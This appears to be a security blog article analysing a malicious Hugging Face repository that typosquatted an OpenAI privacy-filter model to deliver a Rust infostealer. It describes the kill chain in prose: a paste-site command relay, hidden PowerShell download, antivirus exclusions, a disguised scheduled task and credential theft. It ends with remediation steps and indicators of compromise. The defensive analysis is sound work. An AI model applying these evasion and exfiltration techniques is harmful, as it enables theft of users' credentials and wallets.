Fake OpenAI Privacy Filter Hits #1 on Hugging Face — Supply Chain Attack Breakdown
What Happened
On May 7, 2026, AI security firm HiddenLayer identified a malicious repository on Hugging Face called Open-OSS/privacy-filter. At the time of discovery, it had already reached the #1 trending position on the platform with approximately 244,000 downloads and 667 likes — all within 18 hours.
The repository was a near-perfect clone of OpenAI's legitimate openai/privacy-filter model, released in April 2026. OpenAI's Privacy Filter is a tool designed to detect and redact personally identifiable information (PII) from unstructured text — names, email addresses, phone numbers, physical addresses — making it useful for enterprise applications that need strong privacy protections built in.
The attacker copied OpenAI's model card verbatim, including links to OpenAI's official documentation PDF. The only difference in the README was a single instruction: instead of using the standard from_pretrained() method through the transformers library, it told users to clone the repository and run start.bat on Windows or python loader.py on Linux and Mac.
That single difference was the entire attack.
How the Attack Worked: The 6-Stage Kill Chain
Stage 1: The Lure
The typosquatted organization name — "Open-OSS" versus "openai" — was close enough that most developers wouldn't notice. Combined with the copied model card and inflated trending metrics, the repository looked completely legitimate at first glance.
Stage 2: Decoy Code in loader.py
The loader.py file wasn't obviously malicious. It contained a DummyModel class, fake training output, and synthetic dataset generation — all designed to produce convincing terminal output that made it look like a normal AI model was loading.
Behind the scenes, a function called _verify_checksum_integrity() ran silently. The name was deliberately chosen to look like a legitimate security check. In reality, it did the following:
- Disabled SSL verification
- Decoded a base64-encoded URL pointing to jsonkeeper.com, a public paste service
- Fetched a JSON document and extracted a "cmd" field
- Passed that command directly to PowerShell
Everything was wrapped in a try-except block — if it failed, it failed silently. The user would never know.
The use of jsonkeeper.com as a command-and-control (C2) relay was deliberate. The attacker could change the payload at any time by simply updating the paste. The repository itself never needed to be modified, keeping it clean on the surface.
Stage 3: Silent PowerShell Execution
The PowerShell command ran with execution policy bypass, a hidden window, and the CREATE_NO_WINDOW flag. There was no popup, no terminal flash, no visible indication that anything was happening. It downloaded update.bat from api.eth-fastscan.org — a domain designed to look like a blockchain analytics API.
Stage 4: update.bat — System Preparation
The batch file performed six actions:
- Checked for admin rights. If unavailable, triggered a UAC prompt to self-elevate.
- Downloaded the payload executable with a random 8-character filename to make detection harder.
- Added Microsoft Defender exclusion paths so the malware directories would no longer be scanned.
- Created a scheduled task named "MicrosoftEdgeUpdateTaskCore" — designed to look like a legitimate Microsoft Edge browser update.
- The task was configured as one-shot: run once, then delete itself. No trace left in the task scheduler.
Stage 5: Defense Evasion
The payload attempted to disable Windows AMSI (Antimalware Scan Interface) and Event Tracing for Windows (ETW) to stop antivirus detection and logging. It also performed sandbox detection, checking for VirtualBox, VMware, Hyper-V, and Parallels. If any virtualization was detected, execution stopped — a deliberate measure to prevent security researchers from analyzing the malware in controlled environments.
Stage 6: Rust-Based Infostealer
The final payload was a 10MB Rust-based infostealer that harvested:
- Browser data: Saved passwords and session cookies from all Chromium-based browsers and Firefox
- Discord: Authentication tokens and master keys
- Cryptocurrency: Wallet seed phrases, keystores, and browser wallet extension data
- FileZilla: FTP server credentials
- System information: Full host fingerprinting
All stolen data was packaged as JSON and exfiltrated to attacker-controlled infrastructure.
The Fake Trending Numbers
The 244,000 downloads and 667 likes were almost entirely artificial. HiddenLayer found that 657 out of 667 accounts that liked the repository matched predictable bot-naming patterns — "firstname-lastname" followed by random numbers, or "adjectivenoun" followed by four digits. None of these accounts had prior activity on the platform. The download numbers were likely inflated through the same automated processes.
The attackers also promoted the repository on LinkedIn and Reddit, and performed SEO manipulation to ensure the fake repository would appear in search results for "OpenAI Privacy Filter."
Six More Malicious Repositories
This wasn't an isolated incident. HiddenLayer identified six additional repositories under a separate Hugging Face account called "anthfu", all uploaded on April 24, 2026. Each contained the same malicious loader.py logic and used the same command-retrieval URL (jsonkeeper.com/b/AVNNE). The six repos were:
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Merged-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
Notice the pattern — every single name impersonates a popular, in-demand AI model. Qwen3, DeepSeek, Bonsai, Claude — names that developers actively search for. This was a coordinated campaign targeting the AI developer community specifically.
Connection to Broader Supply Chain Operations
The api.eth-fastscan.org domain wasn't unique to this campaign. HiddenLayer observed the same domain serving a separate Windows executable that beaconed to welovechinatown.info, a command-and-control server previously documented in Panther's research into an npm typosquatting campaign. That campaign used a malicious npm package called "trevlo" — published by a user named "titaniumg" on April 4, 2026 — to distribute the WinOS 4.0 implant (also known as ValleyRAT). The trevlo package was downloaded over 2,300 times before removal.
The shared infrastructure suggests these campaigns are connected. The attack surface spans multiple ecosystems: npm, PyPI, and now Hugging Face. Whether it's a single group or connected groups, the operational pattern is the same — typosquat a trusted name, ship malware through the installation process, and steal credentials at scale.
The Bigger Problem: Cloning Open-Source Repos
This attack exposes a fundamental trust problem in open-source AI development.
Hugging Face operates like a GitHub for machine learning models. Anyone can create an organization, upload a model, write a model card, and start accumulating downloads. There is no identity verification for organizations, no mandatory code review for uploaded files, and the trending algorithm can be gamed with bot accounts.
But the problem goes deeper than one platform. The open-source AI ecosystem has several structural vulnerabilities that attackers are increasingly exploiting:
Pickle Deserialization: The Python pickle format, used by PyTorch and many other ML frameworks, allows arbitrary code execution during deserialization. Loading a model in pickle format is equivalent to running whatever code the model creator embedded in it. While Hugging Face uses a tool called Picklescan to detect malicious pickle files, researchers have repeatedly demonstrated ways to bypass it — including using broken pickle files, 7z compression instead of ZIP, and obfuscated payloads. The safer alternative, Safetensors, exists and prevents code execution entirely. But pickle remains dominant in practice because many developers prioritize convenience over security.
No Provenance Verification: When you download a model from Hugging Face, there is no cryptographic chain of trust linking the model to its original creator. A model card can say anything. An organization name can look like anything. There is no equivalent of package signing or verified publisher badges that meaningfully prevent impersonation.
Direct Execution Culture: The standard workflow for many AI developers is: find a model, clone the repository, run the loading script. The Open-OSS/privacy-filter attack exploited this exact workflow. The malicious instruction — "clone and run loader.py" — didn't look unusual because running scripts from cloned repositories is a normalized behavior in the ML community.
Enterprise Exposure: AI developers and data scientists frequently clone open-source models directly into corporate environments — machines with access to source code, cloud credentials, internal APIs, and production systems. A compromised model doesn't just affect one developer's laptop. It can become a beachhead into an entire organization's infrastructure.
This is a Pattern, Not an Incident
In the last few months alone, we've seen:
- LiteLLM/Mercor breach: A compromised Python package in the LiteLLM proxy led to the exposure of 4TB of data from Mercor, including recruiter emails, interview transcripts, and authentication tokens.
- PyTorch Lightning compromise (TeamPCP): A malicious version of the
lightningpackage on PyPI that stole credentials upon installation. - trevlo npm typosquat: A malicious npm package distributing WinOS 4.0/ValleyRAT through a postinstall hook.
- Open-OSS/privacy-filter + anthfu repos: Seven malicious Hugging Face repositories deploying a Rust-based infostealer.
The platform changes. The method changes. But the concept is the same every time: poison a trusted source, exploit developer trust, steal at scale. Supply chain attacks are becoming a pattern, not isolated incidents.
What You Should Do
If You Downloaded Open-OSS/privacy-filter
If you cloned the repository and executed start.bat, python loader.py, or any other file from it on a Windows machine, treat the system as fully compromised. Do not attempt to clean the machine — reimage it. The infostealer's scope makes partial remediation inadequate.
- Rotate every credential that was stored in browsers, password managers, or credential stores on that machine — saved passwords, session cookies, OAuth tokens, SSH keys, FTP credentials, and cloud provider tokens.
- Treat browser sessions as compromised even if passwords were not saved. Stolen session cookies can bypass MFA.
- Move cryptocurrency wallet funds to a new wallet generated on a clean device. Assume seed phrases, keystores, and wallet extension data have been stolen.
- Do not log into anything from the affected machine before reimaging.
For Everyone
- Verify the organization: Before downloading any model from Hugging Face, check the organization. Is it the official account? When was it created? Does it have other repositories with community activity? Is the community tab enabled — disabled community tabs prevent public flagging of malicious content.
- Never run scripts blindly: If a model's README tells you to clone and run a script rather than using standard library methods like
from_pretrained(), that's a red flag. Read the code first. - Download from official repos only: Go to the original organization's account. Not forks, not copies, not similarly-named organizations.
- Prefer Safetensors over Pickle: When downloading PyTorch models, look for Safetensors format. It does not allow arbitrary code execution during deserialization. Avoid loading .pkl or .pt files from untrusted sources.
- Block known IOCs: Add the following to your blocklists —
api.eth-fastscan.org,jsonkeeper.com/b/AVNNE,welovechinatown.info,recargapopular.com.
Indicators of Compromise (IOCs)
| Indicator | Type | Context |
|---|---|---|
| Open-OSS/privacy-filter | Hugging Face Repo | Primary malicious repository (removed) |
| anthfu/* | Hugging Face Account | Six additional malicious repositories |
| api.eth-fastscan.org | Domain (C2) | Payload delivery server |
| jsonkeeper.com/b/AVNNE | URL (C2 relay) | Command retrieval endpoint |
| welovechinatown.info | Domain (C2) | WinOS 4.0 / ValleyRAT C2 server |
| recargapopular.com | Domain (C2) | Data exfiltration endpoint |
| MicrosoftEdgeUpdateTaskCore | Scheduled Task | Persistence mechanism |
| 6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c | SHA-256 | Malicious loader.py (anthfu repos) |
| c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7 | SHA-256 | Secondary payload (o0q2l47f.exe) |
Sources
- HiddenLayer Research — Malware Found in Trending Hugging Face Repository "Open-OSS/privacy-filter"
- The Hacker News — Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face
- Bleeping Computer — Fake OpenAI Repository on Hugging Face Pushes Infostealer Malware
- CSO Online — Malicious Hugging Face Model Masquerading as OpenAI Release
- Security Boulevard — Fake OpenAI Repository on Hugging Face Pushes Infostealer Malware
- Infosecurity Magazine — Malicious Hugging Face Repository Typosquats OpenAI
Related articles
node-ipc Supply Chain Attack: Are You Affected? How to Check and What to Do
Malicious node-ipc versions 9.1.6, 9.2.3, 12.0.1 steal 90+ credential types via DNS tunneling. Check if you're affected and how to fix it.
NGINX Rift (CVE-2026-42945): What It Is and How to Fix It
CVE-2026-42945 is a critical heap buffer overflow in NGINX's rewrite module. Learn what it is, if you're affected, and exactly how to fix it step by s…
CallPhantom: 28 Fake Apps on Google Play Scammed 7.3 Million Users — India Was the Primary Target
ESET uncovered 28 fraudulent Android apps on Google Play promising call history lookups. 7.3M downloads, 53.7% from India, UPI payments exploited. Her…